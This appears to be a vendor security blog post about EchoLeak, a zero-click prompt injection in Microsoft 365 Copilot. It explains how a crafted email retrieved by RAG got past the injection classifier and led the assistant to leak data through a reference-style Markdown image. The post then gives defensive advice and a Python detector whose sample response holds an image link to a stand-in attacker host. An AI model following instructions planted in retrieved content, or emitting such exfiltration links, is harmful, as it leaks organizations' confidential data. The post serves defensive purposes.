In January 2025, a researcher at Aim Labs sent a carefully crafted email to a test inbox. The recipient never opened it. But when they later asked Microsoft 365 Copilot a routine work question, the AI exfiltrated confidential organizational data to an attacker-controlled server. No click required.
That was EchoLeak — CVE-2025-32711, CVSS 9.3. Microsoft patched it in June 2025. The mechanism it exposed is not a solved problem. It is a structural risk that follows any enterprise AI assistant blending untrusted external input with privileged organizational data retrieval.
How an email becomes an extraction tool
EchoLeak chained four weaknesses in Copilot's architecture. A malicious email arrived in the target's Outlook inbox. When the user later queried Copilot on a related topic, the RAG system retrieved that email — it appeared topically relevant. Hidden instructions inside the email, formatted as ordinary prose, were now inside the model's prompt. Copilot followed them: locate confidential files from SharePoint, Teams, or OneDrive, and exfiltrate them via a reference-style Markdown image tag pointing to an external server.
Microsoft's XPIA (cross-prompt injection attempt) classifier was built to stop exactly this. It didn't. The attacker had phrased the instructions to resemble legitimate user content, and the classifier passed them through. Every downstream privilege Copilot held — access to chat history, OneDrive, SharePoint — became available to the attacker without the user doing anything at all.
The trust boundary is new, and most organizations haven't drawn it
RAG-based enterprise assistants work by pulling corporate content into the model's context window. That is what makes them useful: they can answer questions about your own organization. It also means anything in the retrieval corpus — including untrusted external input — becomes something the AI acts on.
Traditional security draws a hard line between data and execution. An email cannot run code. For an LLM copilot, text is instruction. EchoLeak was the first confirmed production exploit where that line collapsed inside an enterprise product, at scale: tens of millions of Microsoft 365 Copilot users were potentially reachable via a single outbound email.
What governance looks like now
The patch is deployed. The attack class is not closed. If your team has a copilot in production, treat the following as a minimum baseline:
- Audit retrieval scope: Every indexed source — every inbox, SharePoint library, Teams channel — is a potential injection surface. Know exactly what Copilot can reach.
- Monitor outbound AI calls: Anomalous external image loads or link fetches from within AI chat sessions are now a real threat signal.
- Red-team your classifier defenses: XPIA and similar controls failed here. Don't assume they hold against your actual document corpus and user patterns.
- Minimize ambient access: Copilot should have read access to what users actually need, not everything the organization has ever indexed.
- Track vendor patch timelines: CVE-2025-32711 was a server-side fix. The next variant may require a client update — and enterprise deployment lag is measured in weeks, not hours.
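One concrete form of the "monitor outbound AI calls" control, given that EchoLeak's channel was a reference-style Markdown image pointing at an external server: an added example (not Microsoft's code and not SaaS Squash's) that resolves inline and reference-style image links in a copilot response, flags any whose host is outside a tenant allow-list, and neutralizes them before the client renders the response. The sample response, the allow-list hosts and the domain names are constructed for the example.

```python
import re
from urllib.parse import urlparse

# Constructed sample of a copilot response: one legitimate tenant image plus a
# reference-style image whose definition points at an external host.
SAMPLE_RESPONSE = """Here is the Q3 summary you asked for.
![chart](https://contoso.sharepoint.com/sites/finance/q3.png)
Thanks for reading. ![status][src]

[src]: https://collector.attacker.invalid/p.gif?n=q3-summary
"""

# Hosts the tenant legitimately serves images from (assumed for this example).
ALLOWED_HOSTS = {"contoso.sharepoint.com", "contoso-my.sharepoint.com"}

INLINE_IMG = re.compile(r"!\[([^\]]*)\]\(\s*<?([^\s)>]+)>?[^)]*\)")   # ![alt](url)
REF_IMG = re.compile(r"!\[([^\]]*)\]\[([^\]]*)\]")                     # ![alt][label]
REF_DEF = re.compile(r"^\s*\[([^\]]+)\]:\s*<?(\S+?)>?(?:\s|$)", re.MULTILINE)  # [label]: url

def image_urls(markdown: str) -> list[str]:
    """Return every image URL in the Markdown, resolving reference-style labels."""
    defs = {label.lower(): url for label, url in REF_DEF.findall(markdown)}
    urls = [url for _, url in INLINE_IMG.findall(markdown)]
    for alt, label in REF_IMG.findall(markdown):
        key = (label or alt).lower()   # "![alt][]" uses the alt text as its label
        if key in defs:
            urls.append(defs[key])
    return urls

def external_image_urls(markdown: str, allowed_hosts=ALLOWED_HOSTS) -> list[str]:
    """Image URLs whose host is not allow-listed: a zero-click exfiltration signal."""
    flagged = []
    for url in image_urls(markdown):
        host = (urlparse(url).hostname or "").lower()
        if host and host not in allowed_hosts:   # relative URLs have no host: skip
            flagged.append(url)
    return flagged

def neutralize(markdown: str, allowed_hosts=ALLOWED_HOSTS) -> str:
    """Replace flagged image URLs so the client never fetches them; text is kept."""
    out = markdown
    for url in external_image_urls(markdown, allowed_hosts):
        out = out.replace(url, "[blocked-external-image]")
    return out

if __name__ == "__main__":
    for url in external_image_urls(SAMPLE_RESPONSE):
        print("ALERT: external image fetch in AI response:", url)
    print(neutralize(SAMPLE_RESPONSE))
```

Run the check on the response text before it reaches the rendering client, and log every flagged URL with the session identity so the SOC can correlate it with the retrieval that produced it.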
When enterprise AI retrieves your most sensitive content to answer questions, it simultaneously becomes the most capable exfiltration channel an attacker has had access to. Designing controls around that reality is not optional — it is governance.
SaaS Squash helps B2B companies map where AI assistants touch sensitive data and build the access controls and monitoring to match. If you have deployed a copilot and haven't run a retrieval scope audit, that is the right conversation to start.